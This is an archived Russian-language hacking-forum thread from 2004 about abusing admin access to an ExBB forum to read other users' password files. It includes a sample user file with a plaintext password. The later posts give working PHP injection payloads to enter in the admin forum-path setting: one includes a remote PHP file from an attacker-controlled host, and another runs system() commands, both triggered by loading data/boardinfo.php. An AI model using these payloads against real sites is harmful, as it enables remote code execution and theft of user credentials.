Просмотр полной версии : Есть админский аккаунт на exbb. Как узнать пассы других юзеров (members/x.php)?
Есть админский аккаунт на exbb. Нет доступа по фтп. Внимание - вопрос. Как узнать пассы других юзеров (members/x.php)
В ExBB нет скуль, только php-injection прокатит я думаю
Найди исходник форума и посмотри где хранятся данные пользователей (если там нет SQL)
Я ж написал в начале - типа инфа каждого пользователя хранится в файле /members/x.php где x - номер юзера. И каждый файл начинается с <? die(); ?> а дальше инфа. Токо вот админ не может просмотреть пароли юзеров, а доступа к файлам этим нету (чтоб прямо прочитать их) .
Файл имеет такой вид в общем
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<?die;?>a:24:{s:4:"name";s:1:"1";s:2:"id";i:1;s:4: "pass";s:6:"dchrsdgjv";s:6:"status";s:2:"ad";s:5:" title";s:13:"Администратор";s:5:"post s";i:1;s:4:"mail";s:9:"1@mail.ru";s:9:"showemail"; b:0;s:3:"www";s:0:"";s:3:"aim";s:0:"";s:3:"icq";s: 0:"";s:8:"location";s:0:"";s:6:"joined";i:10963691 71;s:3:"sig";s:0:"";s:7:"timedif";i:0;s:6:"upload" ;b:1;s:6:"avatar";s:21:"personal/1-avatar.jpg";s:10:"last_visit";i:1096369206;s:7:"pr ivate";a:1:{i:1;b:1;}s:8:"lastpost";a:3:{s:4:"date ";i:1096369361;s:4:"link";s:25:"topic.php?forum=1& topic=1";s:4:"name";s:2:"11";}s:6:"posted";a:1:{i: 1;i:1;}s:4:"lang";s:7:"russian";s:4:"skin";s:8:"Or iginal";s:9:"interests";s:0:"";}
[/QUOTE]<span id='postcolor'>
а доступа к ним нету, надо токо суметь прочитать их каким-то макаром
Ну а какие возможности есть в админке ? Хоть что -то заливать на сервер можно ?
Заливать можно файло типа аватар с расширением gif,jpg,bmp,png,jpeg,pjpeg
а также в папку uploads любые файлы, но! перед помещением в эту папку их имя кодируется в файл с расширением *.ext
Залив файл 1.php получаем файл file-1-1096369361.ext
А все нашел дырку, спс за внимние http://forum.antichat.ru/iB_html/non-cgi/emoticons/rolleyes.gif
Ну эт полудырочка, она ж токо в админпанели %-)
zFailure
18.10.2004, 08:50
2 Gigigi
что за ошибку нашел?
У меня тоже есть админ доступ, нужно только залить мне файлик. Облазил все сорсы ничего не нашёл...
Нужно помощь срочно......
zFailure
19.10.2004, 01:03
http://forum.antichat.ru/cgi-bin....;t=3254 (http://forum.antichat.ru/cgi-bin/ikonboard.cgi?act=ST;f=10;t=3254)
Учитесь у ламера. Короче надо несколько факторов чтоб вам повезло. %-) Пишу по памяти.
*Пункт * проверить заранее и ваще сначала оттестировать на своем серваке как все записыывается, тк после ошибки будет полный облом.
В настройках форума в админпанели ищем где пишется путь к форуму типа http://mazaf.aka/forum/
и вместо него пишем http://mazaf.aka/forum/'; include ('http://yourmaza.fak/anyfile.php'); echo 'lol
Команда echo завершающая для закрытия дальнейшего '; чтоб ошибки не было + НЕЛЬЗЯ юзать символы " $ итд
Короче если вам повезло то файл подключится, в моем случае это было НЕ так, так что я писал
http://mazaf.aka/forum/'; system('set of commands'); echo 'lol
после того как все это сохранили рулим в data/boardinfo.php и запускаем его.
*И если вам повезло (здесь мне повезло (не знаю вроде хтакцес был то ли удален то ли еще чего)) он запускается и выполняет ваш код
zFailure
20.10.2004, 08:50
2 Gigigi
ну бывает упустил из виду! http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
кстати можно просто
http://mazaf.aka/forum/'; include "http://yourmaza.fak/anyfile.php
нельзя </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">include "http://yourmaza[/QUOTE]<span id='postcolor'>
никаких двойных кавычек
zFailure
20.10.2004, 13:35
2 Gigigi http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif
этоже не принципиально, ты ведь понял что я хотел сказать!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot